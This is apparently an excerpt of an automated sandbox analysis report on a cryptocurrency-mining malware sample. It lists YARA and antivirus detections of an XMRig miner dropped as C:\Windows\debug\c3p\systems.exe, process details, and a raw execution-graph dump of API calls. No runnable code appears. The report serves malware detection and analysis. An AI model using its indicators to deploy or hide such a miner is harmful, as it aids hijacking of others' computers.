                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.2583101725.00007FF707684000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000000.1358907279.00007FF707684000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000000.1358706937.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000F.00000000.1358706937.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                                                  • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: 0000000F.00000000.1357815445.00007FF706B91000.00000020.00000001.01000000.00000008.sdmp, Author: unknown
                                                  • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: 0000000F.00000002.2582096108.00007FF706B91000.00000020.00000001.01000000.00000008.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\debug\c3p\systems.exe, Author: Joe Security
                                                  • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\Windows\debug\c3p\systems.exe, Author: unknown
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\debug\c3p\systems.exe, Author: unknown
                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\debug\c3p\systems.exe, Author: Florian Roth
                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\debug\c3p\systems.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 87%, ReversingLabs
                                                  Has exited:false

                                                  Target ID:17
                                                  Start time:15:52:41
                                                  Start date:12/06/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                  Imagebase:0x7ff7b4ee0000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:12.1%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:2%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:39
                                                    execution_graph 22283 420c4f 22290 424f7e 22283->22290 22286 420c62 22288 41a086 __setenvp 67 API calls 22286->22288 22289 420c6d 22288->22289 22303 424ea4 22290->22303 22292 420c54 22292->22286 22293 424d55 22292->22293 22294 424d61 __mtinitlocknum 22293->22294 22295 41eb63 __lock 67 API calls 22294->22295 22296 424d6d 22295->22296 22297 424dd6 22296->22297 22301 424dab DeleteCriticalSection 22296->22301 22331 426b76 22296->22331 22344 424deb 22297->22344 22299 424de2 __mtinitlocknum 22299->22286 22302 41a086 __setenvp 67 API calls 22301->22302 22302->22296 22304 424eb0 __mtinitlocknum 22303->22304 22305 41eb63 __lock 67 API calls 22304->22305 22312 424ebf 22305->22312 22306 424f57 22313 424f75 22306->22313 22309 424f63 __mtinitlocknum 22309->22292 22311 424e5c 105 API calls __fflush_nolock 22311->22312 22312->22306 22312->22311 22316 420cb0 22312->22316 22321 424f46 22312->22321 22324 41ea89 LeaveCriticalSection 22313->22324 22315 424f7c 22315->22309 22317 420cd3 EnterCriticalSection 22316->22317 22318 420cbd 22316->22318 22317->22312 22319 41eb63 __lock 67 API calls 22318->22319 22320 420cc6 22319->22320 22320->22312 22325 420d1e 22321->22325 22323 424f54 22323->22312 22324->22315 22326 420d41 LeaveCriticalSection 22325->22326 22327 420d2e 22325->22327 22326->22323 22330 41ea89 LeaveCriticalSection 22327->22330 22329 420d3e 22329->22323 22330->22329 22332 426b82 __mtinitlocknum 22331->22332 22333 426bb3 22332->22333 22334 426b96 22332->22334 22342 426bab __mtinitlocknum 22333->22342 22347 420c6f 22333->22347 22335 41e96e __fptostr 67 API calls 22334->22335 22337 426b9b 22335->22337 22339 41fcc3 __fptostr 6 API calls 22337->22339 22339->22342 22342->22296 22440 41ea89 LeaveCriticalSection 22344->22440 22346 424df2 22346->22299 22348 420ca3 EnterCriticalSection 22347->22348 22349 420c81 22347->22349 22352 420c99 22348->22352 22349->22348 22350 420c89 22349->22350 22351 41eb63 __lock 67 API calls 22350->22351 22351->22352 22353 426aff 22352->22353 22354 426b13 22353->22354 22355 426b2f 22353->22355 22356 41e96e __fptostr 67 API calls 22354->22356 22357 426b28 22355->22357 22372 424df4 22355->22372 22358 426b18 22356->22358 22369 426bea 22357->22369 22360 41fcc3 __fptostr 6 API calls 22358->22360 22360->22357 22364 4249b7 __fileno 67 API calls 22365 426b49 22364->22365 22382 426d6f 22365->22382 22367 426b4f 22367->22357 22368 41a086 __setenvp 67 API calls 22367->22368 22368->22357 22433 420ce2 22369->22433 22371 426bf0 22371->22342 22373 424e2f 22372->22373 22374 424e0d 22372->22374 22378 428d69 22373->22378 22374->22373 22375 4249b7 __fileno 67 API calls 22374->22375 22376 424e28 22375->22376 22377 42482e __locking 101 API calls 22376->22377 22377->22373 22379 426b43 22378->22379 22380 428d79 22378->22380 22379->22364 22380->22379 22381 41a086 __setenvp 67 API calls 22380->22381 22381->22379 22383 426d7b __mtinitlocknum 22382->22383 22384 426d83 22383->22384 22386 426d9e 22383->22386 22385 41e981 __commit 67 API calls 22384->22385 22388 426d88 22385->22388 22387 426dac 22386->22387 22390 426ded 22386->22390 22389 41e981 __commit 67 API calls 22387->22389 22391 41e96e __fptostr 67 API calls 22388->22391 22392 426db1 22389->22392 22393 426406 ___lock_fhandle 68 API calls 22390->22393 22400 426d90 __mtinitlocknum 22391->22400 22394 41e96e __fptostr 67 API calls 22392->22394 22396 426df3 22393->22396 22395 426db8 22394->22395 22397 41fcc3 __fptostr 6 API calls 22395->22397 22398 426e00 22396->22398 22399 426e0e 22396->22399 22397->22400 22405 426cd3 22398->22405 22402 41e96e __fptostr 67 API calls 22399->22402 22400->22367 22403 426e08 22402->22403 22420 426e32 22403->22420 22406 42638f __commit 67 API calls 22405->22406 22409 426ce3 22406->22409 22407 426d39 22423 426309 22407->22423 22409->22407 22410 426d17 22409->22410 22413 42638f __commit 67 API calls 22409->22413 22410->22407 22411 42638f __commit 67 API calls 22410->22411 22414 426d23 CloseHandle 22411->22414 22416 426d0e 22413->22416 22414->22407 22417 426d2f GetLastError 22414->22417 22415 426d63 22415->22403 22419 42638f __commit 67 API calls 22416->22419 22417->22407 22418 41e994 __dosmaperr 67 API calls 22418->22415 22419->22410 22432 4264a6 LeaveCriticalSection 22420->22432 22422 426e3a 22422->22400 22424 426375 22423->22424 22425 42631a 22423->22425 22426 41e96e __fptostr 67 API calls 22424->22426 22425->22424 22430 426345 22425->22430 22427 42637a 22426->22427 22428 41e981 __commit 67 API calls 22427->22428 22429 42636b 22428->22429 22429->22415 22429->22418 22430->22429 22431 426365 SetStdHandle 22430->22431 22431->22429 22432->22422 22434 420d12 LeaveCriticalSection 22433->22434 22435 420cf3 22433->22435 22434->22371 22435->22434 22436 420cfa 22435->22436 22439 41ea89 LeaveCriticalSection 22436->22439 22438 420d0f 22438->22371 22439->22438 22440->22346 21741 41d45d 21780 41f65c 21741->21780 21743 41d469 GetStartupInfoA 21744 41d48c 21743->21744 21781 41e9b7 HeapCreate 21744->21781 21747 41d4dc 21783 41e6bd GetModuleHandleW 21747->21783 21751 41d4ed __RTC_Initialize 21817 4236c5 21751->21817 21752 41d434 _fast_error_exit 67 API calls 21752->21751 21754 41d4fb 21755 41d507 GetCommandLineA 21754->21755 21756 421055 __amsg_exit 67 API calls 21754->21756 21832 42358e 21755->21832 21758 41d506 21756->21758 21758->21755 21762 41d52c 21871 42325b 21762->21871 21763 421055 __amsg_exit 67 API calls 21763->21762 21766 41d53d 21886 421114 21766->21886 21767 421055 __amsg_exit 67 API calls 21767->21766 21769 41d544 21770 41d54f 21769->21770 21771 421055 __amsg_exit 67 API calls 21769->21771 21892 4231fc 21770->21892 21771->21770 21780->21743 21782 41d4d0 21781->21782 21782->21747 21944 41d434 21782->21944 21784 41e6d1 21783->21784 21785 41e6d8 21783->21785 21788 421025 __crt_waiting_on_module_handle 2 API calls 21784->21788 21786 41e840 21785->21786 21787 41e6e2 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 21785->21787 21966 41e3d7 21786->21966 21790 41e72b TlsAlloc 21787->21790 21789 41e6d7 21788->21789 21789->21785 21793 41d4e2 21790->21793 21794 41e779 TlsSetValue 21790->21794 21793->21751 21793->21752 21794->21793 21795 41e78a 21794->21795 21955 42130f 21795->21955 21798 41e2ad __encode_pointer 6 API calls 21799 41e79a 21798->21799 21800 41e2ad __encode_pointer 6 API calls 21799->21800 21801 41e7aa 21800->21801 21802 41e2ad __encode_pointer 6 API calls 21801->21802 21803 41e7ba 21802->21803 21804 41e2ad __encode_pointer 6 API calls 21803->21804 21805 41e7ca 21804->21805 21962 41e9e7 21805->21962 21808 41e328 __decode_pointer 6 API calls 21809 41e7eb 21808->21809 21809->21786 21810 420ee8 __calloc_crt 67 API calls 21809->21810 21811 41e804 21810->21811 21811->21786 21812 41e328 __decode_pointer 6 API calls 21811->21812 21813 41e81e 21812->21813 21813->21786 21814 41e825 21813->21814 21815 41e414 __mtinit 67 API calls 21814->21815 21816 41e82d GetCurrentThreadId 21815->21816 21816->21793 21983 41f65c 21817->21983 21819 4236d1 GetStartupInfoA 21820 420ee8 __calloc_crt 67 API calls 21819->21820 21827 4236f2 21820->21827 21821 423910 __mtinitlocknum 21821->21754 21822 42388d GetStdHandle 21826 423857 21822->21826 21823 420ee8 __calloc_crt 67 API calls 21823->21827 21824 4238f2 SetHandleCount 21824->21821 21825 42389f GetFileType 21825->21826 21826->21821 21826->21822 21826->21824 21826->21825 21828 423da6 __mtinitlocknum InitializeCriticalSectionAndSpinCount 21826->21828 21827->21821 21827->21823 21827->21826 21830 4237da 21827->21830 21828->21826 21829 423803 GetFileType 21829->21830 21830->21821 21830->21826 21830->21829 21831 423da6 __mtinitlocknum InitializeCriticalSectionAndSpinCount 21830->21831 21831->21830 21833 4235cb 21832->21833 21834 4235ac GetEnvironmentStringsW 21832->21834 21836 4235b4 21833->21836 21837 423664 21833->21837 21835 4235c0 GetLastError 21834->21835 21834->21836 21835->21833 21838 4235f6 WideCharToMultiByte 21836->21838 21839 4235e7 GetEnvironmentStringsW 21836->21839 21840 42366d GetEnvironmentStrings 21837->21840 21841 41d517 21837->21841 21844 42362a 21838->21844 21845 423659 FreeEnvironmentStringsW 21838->21845 21839->21838 21839->21841 21840->21841 21842 42367d 21840->21842 21858 4234d3 21841->21858 21847 420ea3 __malloc_crt 67 API calls 21842->21847 21848 420ea3 __malloc_crt 67 API calls 21844->21848 21845->21841 21849 423697 21847->21849 21850 423630 21848->21850 21851 4236aa ___crtGetEnvironmentStringsA 21849->21851 21852 42369e FreeEnvironmentStringsA 21849->21852 21850->21845 21853 423638 WideCharToMultiByte 21850->21853 21856 4236b4 FreeEnvironmentStringsA 21851->21856 21852->21841 21854 423652 21853->21854 21855 42364a 21853->21855 21854->21845 21857 41a086 __setenvp 67 API calls 21855->21857 21856->21841 21857->21854 21859 4234e8 21858->21859 21860 4234ed GetModuleFileNameA 21858->21860 21990 421c06 21859->21990 21862 423514 21860->21862 21984 423339 21862->21984 21865 41d521 21865->21762 21865->21763 21866 423550 21867 420ea3 __malloc_crt 67 API calls 21866->21867 21868 423556 21867->21868 21868->21865 21869 423339 _parse_cmdline 77 API calls 21868->21869 21870 423570 21869->21870 21870->21865 21872 423264 21871->21872 21875 423269 _strlen 21871->21875 21873 421c06 ___initmbctable 111 API calls 21872->21873 21873->21875 21874 420ee8 __calloc_crt 67 API calls 21881 42329e _strlen 21874->21881 21875->21874 21878 41d532 21875->21878 21876 4232fc 21877 41a086 __setenvp 67 API calls 21876->21877 21877->21878 21878->21766 21878->21767 21879 420ee8 __calloc_crt 67 API calls 21879->21881 21880 423322 21882 41a086 __setenvp 67 API calls 21880->21882 21881->21876 21881->21878 21881->21879 21881->21880 21883 422456 _strcpy_s 67 API calls 21881->21883 21884 4232e3 21881->21884 21882->21878 21883->21881 21884->21881 22185 41fb9b 21884->22185 21887 421122 __IsNonwritableInCurrentImage 21886->21887 22194 422f99 21887->22194 21889 421140 __initterm_e 21890 41c58f __cinit 74 API calls 21889->21890 21891 42115f __IsNonwritableInCurrentImage __initterm 21889->21891 21890->21891 21891->21769 21893 42320a 21892->21893 21897 42320f 21892->21897 21894 421c06 ___initmbctable 111 API calls 21893->21894 21894->21897 21895 41d555 21898 40fb3c 21895->21898 21896 4262f1 _parse_cmdline 77 API calls 21896->21897 21897->21895 21897->21896 22198 410a29 GetModuleHandleW 21898->22198 21902 40fb5f _memset 21903 40fb70 GetCommandLineW 21902->21903 21904 40fbeb GetModuleFileNameW SetEnvironmentVariableW GetModuleHandleW LoadIconW LoadBitmapW 21903->21904 21905 40fb7f 21903->21905 22205 419bde LoadLibraryW LoadLibraryW OleInitialize InitCommonControlsEx SHGetMalloc 21904->22205 22217 40d33c 21905->22217 21909 40fc47 22206 40c09b 21909->22206 21911 40fbe5 21915 40d2e8 2 API calls 21911->21915 21912 40fb8d OpenFileMappingW 21913 40fba6 MapViewOfFile 21912->21913 21914 40fbda CloseHandle 21912->21914 21916 40fbd3 UnmapViewOfFile 21913->21916 21917 40fbb7 ___crtGetEnvironmentStringsA 21913->21917 21914->21904 21915->21904 21916->21914 22224 40d2e8 SetEnvironmentVariableW 21917->22224 21918 40fc52 21920 41994e 3 API calls 21918->21920 21921 40fc69 21920->21921 21922 41994e 3 API calls 21921->21922 21923 40fc73 DialogBoxParamW 21922->21923 21924 40fcad 21923->21924 22211 419c38 21924->22211 21945 41d442 21944->21945 21946 41d447 21944->21946 21947 421508 __FF_MSGBANNER 67 API calls 21945->21947 21948 42135d __NMSG_WRITE 67 API calls 21946->21948 21947->21946 21949 41d44f 21948->21949 21950 4210a9 __mtinitlocknum 3 API calls 21949->21950 21951 41d459 21950->21951 21951->21747 21977 41e31f 21955->21977 21957 421317 __init_pointers __initp_misc_winsig 21980 41e8ce 21957->21980 21960 41e2ad __encode_pointer 6 API calls 21961 41e78f 21960->21961 21961->21798 21963 41e9f2 21962->21963 21964 423da6 __mtinitlocknum InitializeCriticalSectionAndSpinCount 21963->21964 21965 41e7d7 21963->21965 21964->21963 21965->21786 21965->21808 21967 41e3e1 21966->21967 21968 41e3ed 21966->21968 21969 41e328 __decode_pointer 6 API calls 21967->21969 21970 41e401 TlsFree 21968->21970 21971 41e40f 21968->21971 21969->21968 21970->21971 21972 41ea4e DeleteCriticalSection 21971->21972 21973 41ea66 21971->21973 21974 41a086 __setenvp 67 API calls 21972->21974 21975 41ea78 DeleteCriticalSection 21973->21975 21976 41ea86 21973->21976 21974->21971 21975->21973 21976->21793 21978 41e2ad __encode_pointer 6 API calls 21977->21978 21979 41e326 21978->21979 21979->21957 21981 41e2ad __encode_pointer 6 API calls 21980->21981 21982 41e8d8 21981->21982 21982->21960 21983->21819 21986 423358 21984->21986 21988 4233c5 21986->21988 21994 4262f1 21986->21994 21987 4234c3 21987->21865 21987->21866 21988->21987 21989 4262f1 77 API calls _parse_cmdline 21988->21989 21989->21988 21991 421c0f 21990->21991 21993 421c16 21990->21993 22000 421a6c 21991->22000 21993->21860 21997 42629e 21994->21997 21998 41cc88 _LocaleUpdate::_LocaleUpdate 77 API calls 21997->21998 21999 4262b1 21998->21999 21999->21986 22001 421a78 __mtinitlocknum 22000->22001 22002 41e574 __getptd 67 API calls 22001->22002 22003 421a81 22002->22003 22004 421767 _LocaleUpdate::_LocaleUpdate 69 API calls 22003->22004 22005 421a8b 22004->22005 22031 42180b 22005->22031 22008 420ea3 __malloc_crt 67 API calls 22009 421aac 22008->22009 22010 421bcb __mtinitlocknum 22009->22010 22038 421887 22009->22038 22010->21993 22013 421bd8 22013->22010 22017 41a086 __setenvp 67 API calls 22013->22017 22021 421beb 22013->22021 22014 421adc InterlockedDecrement 22015 421aec 22014->22015 22016 421afd InterlockedIncrement 22014->22016 22015->22016 22019 41a086 __setenvp 67 API calls 22015->22019 22016->22010 22020 421b13 22016->22020 22017->22021 22018 41e96e __fptostr 67 API calls 22018->22010 22022 421afc 22019->22022 22020->22010 22023 41eb63 __lock 67 API calls 22020->22023 22021->22018 22022->22016 22025 421b27 InterlockedDecrement 22023->22025 22026 421ba3 22025->22026 22027 421bb6 InterlockedIncrement 22025->22027 22026->22027 22029 41a086 __setenvp 67 API calls 22026->22029 22048 421bcd 22027->22048 22030 421bb5 22029->22030 22030->22027 22032 41cc88 _LocaleUpdate::_LocaleUpdate 77 API calls 22031->22032 22033 42181f 22032->22033 22034 42182a GetOEMCP 22033->22034 22035 421848 22033->22035 22036 42183a 22034->22036 22035->22036 22037 42184d GetACP 22035->22037 22036->22008 22036->22010 22037->22036 22039 42180b getSystemCP 79 API calls 22038->22039 22041 4218a7 22039->22041 22040 4218b2 setSBCS 22042 41e29e __crtGetStringTypeA_stat 5 API calls 22040->22042 22041->22040 22043 4218f6 IsValidCodePage 22041->22043 22047 42191b _memset __setmbcp_nolock 22041->22047 22044 421a6a 22042->22044 22043->22040 22045 421908 GetCPInfo 22043->22045 22044->22013 22044->22014 22045->22040 22045->22047 22051 4215d4 GetCPInfo 22047->22051 22184 41ea89 LeaveCriticalSection 22048->22184 22050 421bd4 22050->22010 22056 421608 _memset 22051->22056 22060 4216ba 22051->22060 22055 41e29e __crtGetStringTypeA_stat 5 API calls 22058 421765 22055->22058 22061 42576c 22056->22061 22058->22047 22059 42230e ___crtLCMapStringA 102 API calls 22059->22060 22060->22055 22062 41cc88 _LocaleUpdate::_LocaleUpdate 77 API calls 22061->22062 22063 42577f 22062->22063 22071 4255b2 22063->22071 22066 42230e 22067 41cc88 _LocaleUpdate::_LocaleUpdate 77 API calls 22066->22067 22068 422321 22067->22068 22137 421f69 22068->22137 22072 4255d3 GetStringTypeW 22071->22072 22073 4255fe 22071->22073 22075 4255f3 GetLastError 22072->22075 22076 4255eb 22072->22076 22074 4256e5 22073->22074 22073->22076 22099 425ab0 GetLocaleInfoA 22074->22099 22075->22073 22077 425637 MultiByteToWideChar 22076->22077 22094 4256df 22076->22094 22083 425664 22077->22083 22077->22094 22079 41e29e __crtGetStringTypeA_stat 5 API calls 22081 421675 22079->22081 22081->22066 22082 425736 GetStringTypeA 22087 425751 22082->22087 22082->22094 22084 41cafe _malloc 67 API calls 22083->22084 22088 425679 _memset __crtGetStringTypeA_stat 22083->22088 22084->22088 22086 4256b2 MultiByteToWideChar 22090 4256c8 GetStringTypeW 22086->22090 22091 4256d9 22086->22091 22092 41a086 __setenvp 67 API calls 22087->22092 22088->22086 22088->22094 22090->22091 22095 421f49 22091->22095 22092->22094 22094->22079 22096 421f66 22095->22096 22097 421f55 22095->22097 22096->22094 22097->22096 22098 41a086 __setenvp 67 API calls 22097->22098 22098->22096 22100 425ae3 22099->22100 22101 425ade 22099->22101 22130 426ae9 22100->22130 22103 41e29e __crtGetStringTypeA_stat 5 API calls 22101->22103 22104 425709 22103->22104 22104->22082 22104->22094 22105 425af9 22104->22105 22106 425bc3 22105->22106 22107 425b39 GetCPInfo 22105->22107 22111 41e29e __crtGetStringTypeA_stat 5 API calls 22106->22111 22108 425b50 22107->22108 22109 425bae MultiByteToWideChar 22107->22109 22108->22109 22110 425b56 GetCPInfo 22108->22110 22109->22106 22114 425b69 _strlen 22109->22114 22110->22109 22113 425b63 22110->22113 22112 42572a 22111->22112 22112->22082 22112->22094 22113->22109 22113->22114 22115 41cafe _malloc 67 API calls 22114->22115 22117 425b9b _memset __crtGetStringTypeA_stat 22114->22117 22115->22117 22116 425bf8 MultiByteToWideChar 22118 425c10 22116->22118 22119 425c2f 22116->22119 22117->22106 22117->22116 22121 425c17 WideCharToMultiByte 22118->22121 22122 425c34 22118->22122 22120 421f49 __freea 67 API calls 22119->22120 22120->22106 22121->22119 22123 425c53 22122->22123 22124 425c3f WideCharToMultiByte 22122->22124 22125 420ee8 __calloc_crt 67 API calls 22123->22125 22124->22119 22124->22123 22126 425c5b 22125->22126 22126->22119 22127 425c64 WideCharToMultiByte 22126->22127 22127->22119 22128 425c76 22127->22128 22129 41a086 __setenvp 67 API calls 22128->22129 22129->22119 22133 426abe 22130->22133 22134 426ad7 22133->22134 22135 42688f strtoxl 91 API calls 22134->22135 22136 426ae4 22135->22136 22136->22101 22138 421f8a LCMapStringW 22137->22138 22142 421fa5 22137->22142 22139 421fad GetLastError 22138->22139 22138->22142 22139->22142 22140 4221a3 22144 425ab0 ___ansicp 91 API calls 22140->22144 22141 421fff 22143 422018 MultiByteToWideChar 22141->22143 22165 42219a 22141->22165 22142->22140 22142->22141 22152 422045 22143->22152 22143->22165 22146 4221cb 22144->22146 22145 41e29e __crtGetStringTypeA_stat 5 API calls 22147 421695 22145->22147 22148 4221e4 22146->22148 22149 4222bf LCMapStringA 22146->22149 22146->22165 22147->22059 22150 425af9 ___convertcp 74 API calls 22148->22150 22162 42221b 22149->22162 22154 4221f6 22150->22154 22151 422096 MultiByteToWideChar 22155 4220af LCMapStringW 22151->22155 22178 422191 22151->22178 22153 41cafe _malloc 67 API calls 22152->22153 22161 42205e __crtGetStringTypeA_stat 22152->22161 22153->22161 22156 422200 LCMapStringA 22154->22156 22154->22165 22159 4220d0 22155->22159 22155->22178 22156->22162 22168 422222 22156->22168 22157 4222e6 22164 41a086 __setenvp 67 API calls 22157->22164 22157->22165 22158 421f49 __freea 67 API calls 22158->22165 22163 4220d9 22159->22163 22167 422102 22159->22167 22160 41a086 __setenvp 67 API calls 22160->22157 22161->22151 22161->22165 22162->22157 22162->22160 22166 4220eb LCMapStringW 22163->22166 22163->22178 22164->22165 22165->22145 22166->22178 22170 42211d __crtGetStringTypeA_stat 22167->22170 22172 41cafe _malloc 67 API calls 22167->22172 22171 422233 _memset __crtGetStringTypeA_stat 22168->22171 22173 41cafe _malloc 67 API calls 22168->22173 22169 422151 LCMapStringW 22174 42218b 22169->22174 22175 422169 WideCharToMultiByte 22169->22175 22170->22169 22170->22178 22171->22162 22177 422271 LCMapStringA 22171->22177 22172->22170 22173->22171 22176 421f49 __freea 67 API calls 22174->22176 22175->22174 22176->22178 22179 422291 22177->22179 22180 42228d 22177->22180 22178->22158 22182 425af9 ___convertcp 74 API calls 22179->22182 22183 421f49 __freea 67 API calls 22180->22183 22182->22180 22183->22162 22184->22050 22192 41a3a0 22185->22192 22187 41fbc8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 22188 41fca4 GetCurrentProcess TerminateProcess 22187->22188 22189 41fc98 __invoke_watson 22187->22189 22190 41e29e __crtGetStringTypeA_stat 5 API calls 22188->22190 22189->22188 22191 41fcc1 22190->22191 22191->21884 22193 41a3ac __VEC_memzero 22192->22193 22193->22187 22195 422f9f 22194->22195 22196 41e2ad __encode_pointer 6 API calls 22195->22196 22197 422fb7 22195->22197 22196->22195 22197->21889 22199 410a38 GetProcAddress 22198->22199 22200 40fb4c OleInitialize 22198->22200 22199->22200 22201 410a48 22199->22201 22202 411adc GetCPInfo 22200->22202 22201->22200 22203 411b00 IsDBCSLeadByte 22202->22203 22203->22203 22204 411b18 22203->22204 22204->21902 22205->21909 22228 40b925 22206->22228 22208 40c0a7 22251 40bde9 GetModuleHandleW FindResourceW 22208->22251 22210 40c0ae 22210->21918 22212 419c48 FreeLibrary 22211->22212 22213 419c4b 22211->22213 22212->22213 22214 419c52 FreeLibrary 22213->22214 22215 419c55 OleUninitialize 22213->22215 22214->22215 22223 40d360 22217->22223 22218 40d46b 22218->21911 22218->21912 22219 40d395 CharUpperW 22219->22223 22220 40d41c CharUpperW 22220->22223 22221 40d3bc CharUpperW 22221->22223 22222 40cd26 124 API calls 22222->22223 22223->22218 22223->22219 22223->22220 22223->22221 22223->22222 22226 40d317 22224->22226 22225 40d336 22225->21916 22226->22225 22227 40d32e SetEnvironmentVariableW 22226->22227 22227->22225 22229 40b92f __EH_prolog _wcschr __write_nolock 22228->22229 22230 40b952 GetModuleFileNameW 22229->22230 22232 40b97b _wcscpy 22229->22232 22231 40b96e _wcsrchr 22230->22231 22231->22232 22250 40b9af ctype 22231->22250 22233 40855b 6 API calls 22232->22233 22244 40b9ab ctype _strncmp 22233->22244 22234 40bae5 22235 408d75 124 API calls 22234->22235 22234->22250 22237 40bb01 22235->22237 22236 408936 122 API calls 22236->22244 22239 41cafe _malloc 67 API calls 22237->22239 22238 408c03 125 API calls 22238->22244 22240 40bb0b 22239->22240 22241 408c03 125 API calls 22240->22241 22240->22250 22243 40bb27 22241->22243 22245 41cafe _malloc 67 API calls 22243->22245 22243->22250 22244->22234 22244->22236 22244->22238 22244->22250 22255 408d75 22244->22255 22246 40bb41 22245->22246 22247 4116c2 MultiByteToWideChar 22246->22247 22246->22250 22248 40bb62 22247->22248 22249 41a086 __setenvp 67 API calls 22248->22249 22249->22250 22250->22208 22252 40be17 22251->22252 22254 40be11 22251->22254 22253 40bc10 ctype 102 API calls 22252->22253 22253->22254 22254->22210 22256 408cd3 124 API calls 22255->22256 22257 408d89 22256->22257 22258 408da0 22257->22258 22259 406360 120 API calls 22257->22259 22258->22244 22259->22258 18667 40daf0 18668 40dafd __write_nolock 18667->18668 18675 40c0b2 18668->18675 18676 40c0c2 ctype 18675->18676 18677 40c0f7 LoadStringW 18676->18677 18678 40c109 LoadStringW 18676->18678 18677->18678 18679 40c117 18677->18679 18678->18679 18688 40bc10 18679->18688 18681 40c125 18682 401b7b 18681->18682 18698 41a577 18682->18698 18685 40ce09 PeekMessageW 18686 40ce24 GetMessageW TranslateMessage DispatchMessageW 18685->18686 18687 40ce45 18685->18687 18686->18687 18689 40bc1d ctype __write_nolock 18688->18689 18693 40bc78 ctype _strlen 18689->18693 18695 40bcd7 _wcsrchr _wcscpy _wcschr ctype _wcsncpy 18689->18695 18696 411683 WideCharToMultiByte 18689->18696 18691 411683 ctype WideCharToMultiByte 18692 40bca5 ctype _strlen 18691->18692 18694 401b7b _swprintf 101 API calls 18692->18694 18693->18691 18694->18695 18695->18681 18697 4116ad 18696->18697 18697->18693 18701 41a47f 18698->18701 18702 41a4af 18701->18702 18703 41a48f 18701->18703 18705 41a4bf 18702->18705 18711 41a4df 18702->18711 18716 41e96e 18703->18716 18707 41e96e __fptostr 67 API calls 18705->18707 18709 41a4c4 18707->18709 18710 41fcc3 __fptostr 6 API calls 18709->18710 18714 401b93 SetDlgItemTextW 18710->18714 18712 41a526 18711->18712 18711->18714 18722 41fa28 18711->18722 18712->18714 18715 41fa28 __flsbuf 101 API calls 18712->18715 18714->18685 18715->18714 18743 41e4fb GetLastError 18716->18743 18718 41a494 18719 41fcc3 18718->18719 18720 41e328 __decode_pointer 6 API calls 18719->18720 18721 41fcd3 __invoke_watson 18720->18721 18984 4249b7 18722->18984 18725 41fa43 18727 41e96e __fptostr 67 API calls 18725->18727 18726 41fa5a 18728 41fa6b __flswbuf 18726->18728 18729 41fa5e 18726->18729 18731 41fa48 18727->18731 18728->18731 18739 41fac1 18728->18739 18742 41facc 18728->18742 18990 424953 18728->18990 18730 41e96e __fptostr 67 API calls 18729->18730 18730->18731 18731->18712 18732 41fb5b 18734 42482e __locking 101 API calls 18732->18734 18733 41fadb 18735 41faf2 18733->18735 18738 41fb0f 18733->18738 18734->18731 19002 42482e 18735->19002 18738->18731 19027 423fe2 18738->19027 18739->18742 18999 42490a 18739->18999 18742->18732 18742->18733 18757 41e3a3 TlsGetValue 18743->18757 18746 41e568 SetLastError 18746->18718 18751 41e547 18778 41e414 18751->18778 18752 41e55f 18796 41a086 18752->18796 18755 41e54f GetCurrentThreadId 18755->18746 18756 41e565 18756->18746 18758 41e3d3 18757->18758 18759 41e3b8 18757->18759 18758->18746 18762 420ee8 18758->18762 18760 41e328 __decode_pointer 6 API calls 18759->18760 18761 41e3c3 TlsSetValue 18760->18761 18761->18758 18764 420ef1 18762->18764 18765 41e526 18764->18765 18766 420f0f Sleep 18764->18766 18809 424f87 18764->18809 18765->18746 18768 41e328 TlsGetValue 18765->18768 18767 420f24 18766->18767 18767->18764 18767->18765 18769 41e361 GetModuleHandleW 18768->18769 18770 41e340 18768->18770 18771 41e371 18769->18771 18772 41e37c GetProcAddress 18769->18772 18770->18769 18773 41e34a TlsGetValue 18770->18773 18944 421025 18771->18944 18775 41e359 18772->18775 18777 41e355 18773->18777 18775->18751 18775->18752 18777->18769 18777->18775 18948 41f65c 18778->18948 18780 41e420 GetModuleHandleW 18781 41e430 18780->18781 18782 41e436 18780->18782 18783 421025 __crt_waiting_on_module_handle 2 API calls 18781->18783 18784 41e472 18782->18784 18785 41e44e GetProcAddress GetProcAddress 18782->18785 18783->18782 18786 41eb63 __lock 63 API calls 18784->18786 18785->18784 18787 41e491 InterlockedIncrement 18786->18787 18949 41e4e9 